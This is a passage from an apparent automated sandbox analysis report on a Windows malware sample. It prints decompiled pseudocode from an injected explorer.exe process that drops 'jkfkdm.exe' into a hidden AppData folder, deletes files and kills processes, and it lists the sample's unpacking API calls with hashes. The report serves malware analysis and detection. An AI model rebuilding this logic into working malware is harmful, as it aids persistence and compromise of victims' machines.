				_t46 = _t44 + 0x24;
				if(_t28 <= 0) {
					_t30 = E0151CFD0(_t40, "C:\Users\Luke\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe", 1);
					_pop(_t42);
					_v8 = _t30;
					if(_t30 != 0) {
						_t31 = E01515350(_t42, 0x1d89);
						_pop(_t43);
						_v12 = _t31;
						_t51 = _t31;
						if(_t31 != 0) {
							E01504504(_t43, _t51,  &_v52, _v8, _t31);
							E01515460( &_v12);
							E01513990( &_v8, 0xffffffff);
							_t46 = _t46 + 0x18;
						}
						E01513BA0(_t43,  &_v52, 0, 0x28);
					}
				}
				return 0;
			}

0x015048f0
0x015048f0
0x015048f6
0x015048fa
0x01504909
0x0150491a
0x01504928
0x01504935
0x0150493d
0x0150493e
0x01504943
0x01504948
0x01504951
0x01504957
0x01504958
0x0150495d
0x01504964
0x01504969
0x0150496a
0x0150496d
0x0150496f
0x01504979
0x01504982
0x0150498d
0x01504992
0x01504992
0x0150499d
0x015049a2
0x0150495d
0x015049a8

APIs

lstrcatA.KERNEL32(?,0152A3EC), ref: 0150491A

Part of subcall function 0151CF00: lstrlenA.KERNEL32(0151CFBB,00000000), ref: 0151CF0F

Part of subcall function 01504504: lstrcatW.KERNEL32(?,00000000), ref: 01504574

Part of subcall function 01513990: lstrlenA.KERNEL32(01515216,?,0151546E,01516857,000000FF), ref: 015139A7
Part of subcall function 01513990: HeapFree.KERNEL32(018E0000,00000000,00000000), ref: 015139EA

Strings

jkfkdm, xrefs: 01504903
C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe, xrefs: 0150494C

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcatlstrlen$FreeHeap
String ID: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe$jkfkdm
API String ID: 1384350949-1554624213
Opcode ID: ea1c5178d885f17aaba182ad55770cbf30a50e0284499913380469fa42028927
Instruction ID: 8fdf85521a3559371abdad9aa05e693b3380bb19de623d257b9f4a20df2475b9
Opcode Fuzzy Hash: ea1c5178d885f17aaba182ad55770cbf30a50e0284499913380469fa42028927
Instruction Fuzzy Hash: 42114CB2D5020BBAEB12EAF4DC45F9D73BC7B60615F640429B600EB085FBB5D2048665

Uniqueness

Uniqueness Score: 100.00%

Function 015049A9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
stringUNIQUE

Download Yara Rule

C-Code - Quality: 95%

			E015049A9(void* __ecx, void* __eflags, void* __fp0) {
				signed int _v8;
				signed int _v12;
				char _v52;
				char _v116;
				signed int _t32;
				signed int _t39;
				void* _t41;
				void* _t43;
				void* _t44;
				void* _t50;

				_t50 = __fp0;
				_t44 = __eflags;
				_t36 = __ecx;
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				E01513D60(__ecx,  &_v116, "jkfkdm", 0x40);
				lstrcatA( &_v116, 0x152a378);
				E0151CF00(_t44,  &_v52,  &_v116);
				E01513BA0(_t36,  &_v116, 0, 0x40);
				E0151CB84(_t36,  &_v52);
				_t37 = E0151BD40( &_v8);
				_t43 = _t41 + 0x28;
				if(_t30 != 0) {
					_t39 = 0;
					if(_v8 > 0) {
						do {
							_t32 = E015046BE(_t36,  *((intOrPtr*)(_t37 + _t39 * 4)));
							_pop(_t36);
							_v12 = _t32;
							_t47 = _t32;
							if(_t32 != 0) {
								E0151BB80(_t47, _t50, _t32);
								E01513990( &_v12, 0xfffffffe);
								_t43 = _t43 + 0xc;
							}
							_t39 = _t39 + 1;
						} while (_t39 < _v8);
					}
				}
				return 0;
			}

0x015049a9
0x015049a9
0x015049a9
0x015049af
0x015049b3
0x015049c3
0x015049d4
0x015049e2
0x015049ef
0x015049f8
0x01504a06
0x01504a08
0x01504a0d
0x01504a10
0x01504a15
0x01504a17
0x01504a1a
0x01504a1f
0x01504a20
0x01504a23
0x01504a25
0x01504a28
0x01504a33
0x01504a38
0x01504a38
0x01504a3b
0x01504a3c
0x01504a17
0x01504a41
0x01504a46

APIs

lstrcatA.KERNEL32(?,0152A378), ref: 015049D4

Part of subcall function 0151CF00: lstrlenA.KERNEL32(0151CFBB,00000000), ref: 0151CF0F

Part of subcall function 0151BD40: memset.MSVCRT(?,00000000,00000206), ref: 0151BD72
Part of subcall function 0151BD40: GetEnvironmentVariableW.KERNEL32(00000000,?,00000207), ref: 0151BDCA

Part of subcall function 0151BB80: SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0151BB92
Part of subcall function 0151BB80: DeleteFileW.KERNEL32(00000000), ref: 0151BBD0

Part of subcall function 01513990: lstrlenA.KERNEL32(01515216,?,0151546E,01516857,000000FF), ref: 015139A7
Part of subcall function 01513990: HeapFree.KERNEL32(018E0000,00000000,00000000), ref: 015139EA

Strings

PX, xrefs: 01504A32
jkfkdm, xrefs: 015049BD

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Filelstrlen$AttributesDeleteEnvironmentFreeHeapVariablelstrcatmemset
String ID: PX$jkfkdm
API String ID: 2774916202-2697631999
Opcode ID: 1dd12ca89c8faf708f3f859ab85f1a5f7bb8a6e013142ca7db904e6c8222d037
Instruction ID: 5d8b05885f9f5cd9cb9ca0c378dbdaede707b626890595c2b78cb9dfd6d617a5
Opcode Fuzzy Hash: 1dd12ca89c8faf708f3f859ab85f1a5f7bb8a6e013142ca7db904e6c8222d037
Instruction Fuzzy Hash: 5E119172C0021EB6DF12EBF4CC05FDEB7BD7B94210F640469A610FB085F67596458BA4

Uniqueness

Uniqueness Score: 100.00%

Function 01519D70, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37
windowUNIQUE

Download Yara Rule

C-Code - Quality: 37%

			E01519D70(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;

				if(_a8 != 0x46 || 0 == 0) {
					_v8 =  *0x1538a78(_a4, _a8, _a12, _a16);
					if(_a8 == 0x110) {
						PostMessageA(_a4, 0x111, 1, 0);
					}
					return _v8;
				} else {
					_v12 = _a16;
					 *((intOrPtr*)(_v12 + 8)) = 0x2ee0;
					 *((intOrPtr*)(_v12 + 0x18)) = 0x24;
					return 1;
				}
			}

0x01519d7a
0x01519db7
0x01519dc1
0x01519dd0
0x01519dd0
0x00000000
0x01519d80
0x01519d83
0x01519d89
0x01519d93
0x00000000
0x01519d9a

APIs

PostMessageA.USER32(?,00000111,00000001,00000000), ref: 01519DD0

Strings

F., xrefs: 01519DA9
F, xrefs: 01519D76

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: MessagePost
String ID: F$F.
API String ID: 410705778-1016742029
Opcode ID: c89213e1ac643c9db4bc8ccd3d0332946412f776a3a3438ad803c8884ff57feb
Instruction ID: 0f6a24142ae8d017db3a7da87d15c65cfcc52dac78ea22197fbca53aeef0f40f
Opcode Fuzzy Hash: c89213e1ac643c9db4bc8ccd3d0332946412f776a3a3438ad803c8884ff57feb
Instruction Fuzzy Hash: 0E016D7860020CEBEB14CFA8D884A9E7BB5FB48310F108548FE059F384C2B1D990DB91

Uniqueness

Uniqueness Score: 100.00%

Function 01505A48, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01505A48(void* __eflags, intOrPtr _a4) {
				char _v36;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				void* _t29;
				signed int _t32;

				_t18 =  *0x153a97c; // 0x0
				_t32 = _a4 + _a4;
				E01513C30( &_v36, 0x20, "p%08x",  *((intOrPtr*)(_t18 + _t32 * 8)));
				if(E0151F820(_t29,  &_v36) != 0) {
					_t24 =  *0x153a97c; // 0x0
					if(WaitForSingleObject( *(_t24 + 8 + _t32 * 8), 0x2710) != 0) {
						_t27 =  *0x153a97c; // 0x0
						TerminateProcess( *(_t27 + 8 + _t32 * 8), 1);
					}
					_t26 =  *0x153a97c; // 0x0
					 *(_t26 + 4 + _t32 * 8) =  *(_t26 + 4 + _t32 * 8) & 0x00000000;
				}
				return 0;
			}

0x01505a4b
0x01505a57
0x01505a67
0x01505a7a
0x01505a7c
0x01505a92
0x01505a99
0x01505aa4
0x01505aa4
0x01505aaa
0x01505aaf
0x01505aaf
0x01505ab8

APIs

Part of subcall function 01513C30: wvnsprintfA.SHLWAPI(?,?,?,00000000,?,?,?,jkfkdm,00000000), ref: 01513C5E
Part of subcall function 01513C30: lstrlenA.KERNEL32(00000000), ref: 01513C82

Part of subcall function 0151F820: OpenEventA.KERNEL32(00000002,00000000,00000000,?,?,01505A75,?,?,00000020,p%08x,00000000,00000000,?,?,?,01505ADB), ref: 0151F82C

WaitForSingleObject.KERNEL32(?,00002710,?,?,?,?,00000000,?,?,?,01505ADB,00000000,jkfkdm,?,0150664F), ref: 01505A8A
TerminateProcess.KERNEL32(?,00000001,?,?,?,?,00000000,?,?,?,01505ADB,00000000,jkfkdm,?,0150664F), ref: 01505AA4

Strings

p%08x, xrefs: 01505A5F

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: EventObjectOpenProcessSingleTerminateWaitlstrlenwvnsprintf
String ID: p%08x
API String ID: 1065154215-3308710075
Opcode ID: 28b01b0e3b11539b7c7f769baa770e2c5476cbddaae2533af62c6edae856404e
Instruction ID: 6a00396643ed5e8572b3d7269d8c140e02d31283c8498645ee26ea7707cf930b
Opcode Fuzzy Hash: 28b01b0e3b11539b7c7f769baa770e2c5476cbddaae2533af62c6edae856404e
Instruction Fuzzy Hash: 74F02233611214AFEF319BA8DC49F4837A8FB08304F024018F911EF296EBB2E554CBA4

Uniqueness

Uniqueness Score: 4.65%

Function 003F3E00, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
timeUNIQUE

Download Yara Rule

C-Code - Quality: 91%

			E003F3E00(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _t26;
				intOrPtr* _t28;

				_t1 =  &_v12; // 0x3f35ed
				GetSystemTimeAsFileTime(_t1);
				_v16 = _v8;
				_t4 =  &_v12; // 0x3f35ed
				_t26 =  *_t4;
				_v20 = _t26;
				asm("sbb ecx, 0x19db1de");
				_v28 = E003F3A00(_v20 - 0xd53e8000, _v16, 0x989680, 0);
				_v24 = _t26;
				if(_a4 != 0) {
					_t28 = _a4;
					 *_t28 = _v28;
					 *((intOrPtr*)(_t28 + 4)) = _v24;
				}
				return _v28;
			}

0x003f3e06
0x003f3e0a
0x003f3e13
0x003f3e16
0x003f3e16
0x003f3e19
0x003f3e27
0x003f3e3b
0x003f3e3e
0x003f3e45
0x003f3e47
0x003f3e4d
0x003f3e52
0x003f3e52
0x003f3e5e

APIs

GetSystemTimeAsFileTime.KERNEL32(5?,?,?,?,?,003F35ED,00000000), ref: 003F3E0A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003F3E36

Strings

5?, xrefs: 003F3E06, 003F3E16, 003F3E09

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: 5?
API String ID: 1518329722-4033248023
Opcode ID: 08cebfa00ea5212e73a9499a65e5fdd4803d123a79f604354077ef1a5303113e
Instruction ID: 30f4fa21fdd420e4a7564ea82e5ea9929fda31c7248aed505732c90c20231251
Opcode Fuzzy Hash: 08cebfa00ea5212e73a9499a65e5fdd4803d123a79f604354077ef1a5303113e
Instruction Fuzzy Hash: F20179B4D0020DAFCB04DFA8D955AAEFBB5FF48300F508659E959A7344D770AA40CBD5

Uniqueness

Uniqueness Score: 100.00%

Analysis Process: jkfkdm.exe PID: 2660 Parent PID: 2480 jkfkdm.exeCOMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 01252A35, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 01252ABA

Memory Dump Source

Source File: 0000000E.00000002.491207370.01250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1250000_jkfkdm.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f6a722a49710d6dc48aa2a975a16a381109f76505e301e5e3cfd92065313d222
Instruction ID: 2c3b492dbde11bc64fb09a9f0ff4d816b1838b2f659c890c7eaafe11b49fcc8c
Opcode Fuzzy Hash: f6a722a49710d6dc48aa2a975a16a381109f76505e301e5e3cfd92065313d222
Instruction Fuzzy Hash: 92214AB1E20209CFCB54DFA9D8915AEBBF1FF88310F14416AE909A7380D734A941CB95

Uniqueness

Uniqueness Score: 0.01%

Function 01251827, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 275
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 012518F9
VirtualProtect.KERNELBASE ref: 012519B9
VirtualProtect.KERNELBASE ref: 01251CA0

Strings

p, xrefs: 01251B05
Cy, xrefs: 01251855

Memory Dump Source

Source File: 0000000E.00000002.491207370.01250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1250000_jkfkdm.jbxd

Similarity

API ID: ProtectVirtual
String ID: Cy$p
API String ID: 544645111-1378413450
Opcode ID: 67250be62eed2a5fc091b27f95e9e2a03ce104d06ca0259083e22f347ec7f50b
Instruction ID: 010d4ae3809e955b5306a066b48ba667a37dfa02edc850fdfce9ab4c3c2aaa6b
Opcode Fuzzy Hash: 67250be62eed2a5fc091b27f95e9e2a03ce104d06ca0259083e22f347ec7f50b
Instruction Fuzzy Hash: 05D1E075A183818FD364CF29C080B9AFBE1BFD8314F15895EE99D97361E771A841CB82

Uniqueness

Uniqueness Score: 100.00%

Function 01251826, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 225
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 012518F9
VirtualProtect.KERNELBASE ref: 012519B9
VirtualProtect.KERNELBASE ref: 01251CA0

Strings

Cy, xrefs: 01251855

Memory Dump Source

Source File: 0000000E.00000002.491207370.01250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1250000_jkfkdm.jbxd

Similarity

API ID: ProtectVirtual
String ID: Cy
API String ID: 544645111-3008677793
Opcode ID: dcc0fc18b1c3e47c9403ac0ff838c80563365132d21f877ed104bbd84896e068
Instruction ID: ba35f5681d649233f7060a57391b61cee25ca96cddd252cef2a16937dd2d0540
Opcode Fuzzy Hash: dcc0fc18b1c3e47c9403ac0ff838c80563365132d21f877ed104bbd84896e068
Instruction Fuzzy Hash: A6B1E375A183818FD368CF29C08079AFBE1BFC8314F15891EE9D997361E730A841CB82

Uniqueness

Uniqueness Score: 100.00%

Function 01252D3A, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 148
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 01252E41

Strings

fg(, xrefs: 01252DD0

Memory Dump Source

Source File: 0000000E.00000002.491207370.01250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1250000_jkfkdm.jbxd

Similarity

API ID: AllocVirtual
String ID: fg(
API String ID: 4275171209-1623029493
Opcode ID: ff81fc3ebf4ceace7e9ecac7a11187996e8646a851cbfc2bd2b4a2004e1f028d
Instruction ID: e0bf6788d3d179a4d309bec80265a52dea0102f71917f5f5fd6c43906ba918b5
Opcode Fuzzy Hash: ff81fc3ebf4ceace7e9ecac7a11187996e8646a851cbfc2bd2b4a2004e1f028d
Instruction Fuzzy Hash: F361BCB5A193818FD348DF29C18065AFBF1BFC8714F11991EE8889B351E3B5E845CB86

Uniqueness

Uniqueness Score: 100.00%

Function 01252593, Relevance: 1.6, APIs: 1, Instructions: 118
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 012526B9

Memory Dump Source

Source File: 0000000E.00000002.491207370.01250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1250000_jkfkdm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 94079a8d7e0a8657ffb95dabc3fff951ac91d831d766877d761f4c9ab4c9426f
Instruction ID: a0a05a4a38fe22f65d16eec546934bfd0babb91effb080c0259a8bf898bca09c
Opcode Fuzzy Hash: 94079a8d7e0a8657ffb95dabc3fff951ac91d831d766877d761f4c9ab4c9426f
Instruction Fuzzy Hash: A651BB79A19380CFC3A8CF28C19075AFBE2BFC9714F54892EE99997350D771A841CB42

Uniqueness

Uniqueness Score: 0.02%

Function 0125273A, Relevance: 1.6, APIs: 1, Instructions: 84
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 012526B9
GetProcAddress.KERNELBASE ref: 012527AE

Memory Dump Source

Source File: 0000000E.00000002.491207370.01250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1250000_jkfkdm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: d8878856bc08774b7035ebf957fb3061181c92b3f836b43baccf40fc95fb68ef
Instruction ID: 470984c132b62881bbcd1c96841ef390986f7724703b1af36cb1594b37628549
Opcode Fuzzy Hash: d8878856bc08774b7035ebf957fb3061181c92b3f836b43baccf40fc95fb68ef
Instruction Fuzzy Hash: D931FF76A28341CFC768CF69C19065AF7E2BFD8714F15891EE99997380D770A804CF82

Uniqueness

Uniqueness Score: 0.01%

Function 012525B6, Relevance: 1.6, APIs: 1, Instructions: 67
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 012526B9

Memory Dump Source

Source File: 0000000E.00000002.491207370.01250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1250000_jkfkdm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: dc0c4d43fe983135e74e490fe037b27f10ab28b4497bd724162dc62f42f2da68
Instruction ID: 0a5fb7cedc9bf58d141af1eff5bee171601208c5c64ba86f09d02a558666b99e
Opcode Fuzzy Hash: dc0c4d43fe983135e74e490fe037b27f10ab28b4497bd724162dc62f42f2da68
Instruction Fuzzy Hash: 6F21BF74A19341CFC7A8CF28D19075ABBE1BBC8714F50492EFA9A97390D770A840CB42

Uniqueness

Uniqueness Score: 0.02%

Non-executed Functions

Analysis Process: jkfkdm.exe PID: 696 Parent PID: 1692 jkfkdm.exeCOMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 012A2A35, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 012A2ABA

Memory Dump Source

Source File: 00000011.00000002.518655910.012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_12a0000_jkfkdm.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8906eb31e9118a2fa3c5e95263462e3b3c03d83f624af64be7f40eb4e3505417
Instruction ID: 00c2083aff448822225531dbc0f4af68b2aa77adc9ca065a412f5170a44ab68f
Opcode Fuzzy Hash: 8906eb31e9118a2fa3c5e95263462e3b3c03d83f624af64be7f40eb4e3505417
Instruction Fuzzy Hash: 6A214AB1E20209CFCB18DFA9D8615AEBBF1FF88300F54416AE905A7341D774A941CB95

Uniqueness

Uniqueness Score: 0.01%

Function 012A1827, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 275
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 012A18F9
VirtualProtect.KERNELBASE ref: 012A19B9
VirtualProtect.KERNELBASE ref: 012A1CA0

Strings

p, xrefs: 012A1B05
Cy, xrefs: 012A1855

Memory Dump Source

Source File: 00000011.00000002.518655910.012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_12a0000_jkfkdm.jbxd

Similarity

API ID: ProtectVirtual
String ID: Cy$p
API String ID: 544645111-1378413450
Opcode ID: 842e356fa9eb14b3baf7a38380a62c8f07b70b9b207bdc2760a56400c21769dc
Instruction ID: 7dad6f09c9cc29afd16b7856779d41ec5031c6ee6e01e6de42fbd0bf4e8ae85f
Opcode Fuzzy Hash: 842e356fa9eb14b3baf7a38380a62c8f07b70b9b207bdc2760a56400c21769dc
Instruction Fuzzy Hash: 10D1E075A183818FD324CF29C080B9AFBE1BFD8314F55895EE99D97361E771A841CB82

Uniqueness

Uniqueness Score: 100.00%

Function 012A1826, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 225
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 012A18F9
VirtualProtect.KERNELBASE ref: 012A19B9
VirtualProtect.KERNELBASE ref: 012A1CA0

Strings

Cy, xrefs: 012A1855

Memory Dump Source

Source File: 00000011.00000002.518655910.012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_12a0000_jkfkdm.jbxd

Similarity

API ID: ProtectVirtual
String ID: Cy
API String ID: 544645111-3008677793
Opcode ID: d5ea24e2188aac1ff696d698a987da065c8695a77d52d0f141e793a7e491f228
Instruction ID: 88d559dafd0174bac8f72d8b30a13386d2ca94e9cd44162f4b081e39bf24507b
Opcode Fuzzy Hash: d5ea24e2188aac1ff696d698a987da065c8695a77d52d0f141e793a7e491f228
Instruction Fuzzy Hash: 74B1E375A183818FD328CF29C08069AFBE1BFC8314F55895EE9D997361E730A841CB82

Uniqueness

Uniqueness Score: 100.00%

Function 012A2D3A, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 148
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 012A2E41

Strings

fg(, xrefs: 012A2DD0

Memory Dump Source

Source File: 00000011.00000002.518655910.012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_12a0000_jkfkdm.jbxd

Similarity

API ID: AllocVirtual
String ID: fg(
API String ID: 4275171209-1623029493
Opcode ID: ff81fc3ebf4ceace7e9ecac7a11187996e8646a851cbfc2bd2b4a2004e1f028d
Instruction ID: c2e493d793a49d2988715ef337269e6ba9ce9ca6006a8b8abf3faad551332d44
Opcode Fuzzy Hash: ff81fc3ebf4ceace7e9ecac7a11187996e8646a851cbfc2bd2b4a2004e1f028d
Instruction Fuzzy Hash: 8261BCB5A193818FC348DF29C18065AFBF1BFC8714F51891EE8888B351E3B5E845CB86

Uniqueness

Uniqueness Score: 100.00%

Function 012A2593, Relevance: 1.6, APIs: 1, Instructions: 118
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 012A26B9

Memory Dump Source

Source File: 00000011.00000002.518655910.012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_12a0000_jkfkdm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 94079a8d7e0a8657ffb95dabc3fff951ac91d831d766877d761f4c9ab4c9426f
Instruction ID: d481d0e63fd2b4a5740da32bed6a9e2c03afd3b00326107020043cc60316ea05
Opcode Fuzzy Hash: 94079a8d7e0a8657ffb95dabc3fff951ac91d831d766877d761f4c9ab4c9426f
Instruction Fuzzy Hash: 0B51B979A19380CFC368CF28C19065ABBE2BFC9714F54892EE9D997310D671A841CB82

Uniqueness

Uniqueness Score: 0.02%

Function 012A273A, Relevance: 1.6, APIs: 1, Instructions: 84
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 012A26B9
GetProcAddress.KERNELBASE ref: 012A27AE

Memory Dump Source

Source File: 00000011.00000002.518655910.012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_12a0000_jkfkdm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: d8878856bc08774b7035ebf957fb3061181c92b3f836b43baccf40fc95fb68ef
Instruction ID: 75d3762f82f5cadbfd1118426c14d7117f6373adfeba9ade10f19e0abda1628d
Opcode Fuzzy Hash: d8878856bc08774b7035ebf957fb3061181c92b3f836b43baccf40fc95fb68ef
Instruction Fuzzy Hash: 5C31DF76A18341CFD728CF29C19065AF7E2BFD8B14F55891EE99997340D774A804CF82

Uniqueness

Uniqueness Score: 0.01%

Function 012A25B6, Relevance: 1.6, APIs: 1, Instructions: 67
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 012A26B9

Memory Dump Source

Source File: 00000011.00000002.518655910.012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_12a0000_jkfkdm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: dc0c4d43fe983135e74e490fe037b27f10ab28b4497bd724162dc62f42f2da68
Instruction ID: 13a57926b6f6e454ac90a2bf44d05f0206bbfdadd3c3ec58f0b16d81d2269488
Opcode Fuzzy Hash: dc0c4d43fe983135e74e490fe037b27f10ab28b4497bd724162dc62f42f2da68
Instruction Fuzzy Hash: 48219D75A29341CFC768CF28D19075EBBE1BBC8714F94492EF69A97350D771A840CB42

Uniqueness

Uniqueness Score: 0.02%

Non-executed Functions

Analysis Process: jkfkdm.exe PID: 1864 Parent PID: 696 jkfkdm.exeCOMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 01252A35, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 01252ABA

Memory Dump Source

Source File: 00000012.00000002.517110914.01250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1250000_jkfkdm.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f6a722a49710d6dc48aa2a975a16a381109f76505e301e5e3cfd92065313d222
Instruction ID: 2c3b492dbde11bc64fb09a9f0ff4d816b1838b2f659c890c7eaafe11b49fcc8c
Opcode Fuzzy Hash: f6a722a49710d6dc48aa2a975a16a381109f76505e301e5e3cfd92065313d222
Instruction Fuzzy Hash: 92214AB1E20209CFCB54DFA9D8915AEBBF1FF88310F14416AE909A7380D734A941CB95

Uniqueness

Uniqueness Score: 0.01%

Function 01251827, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 275
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 012518F9
VirtualProtect.KERNELBASE ref: 012519B9
VirtualProtect.KERNELBASE ref: 01251CA0

Strings

p, xrefs: 01251B05
Cy, xrefs: 01251855

Memory Dump Source

Source File: 00000012.00000002.517110914.01250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1250000_jkfkdm.jbxd

Similarity

API ID: ProtectVirtual
String ID: Cy$p
API String ID: 544645111-1378413450
Opcode ID: 67250be62eed2a5fc091b27f95e9e2a03ce104d06ca0259083e22f347ec7f50b
Instruction ID: 010d4ae3809e955b5306a066b48ba667a37dfa02edc850fdfce9ab4c3c2aaa6b
Opcode Fuzzy Hash: 67250be62eed2a5fc091b27f95e9e2a03ce104d06ca0259083e22f347ec7f50b
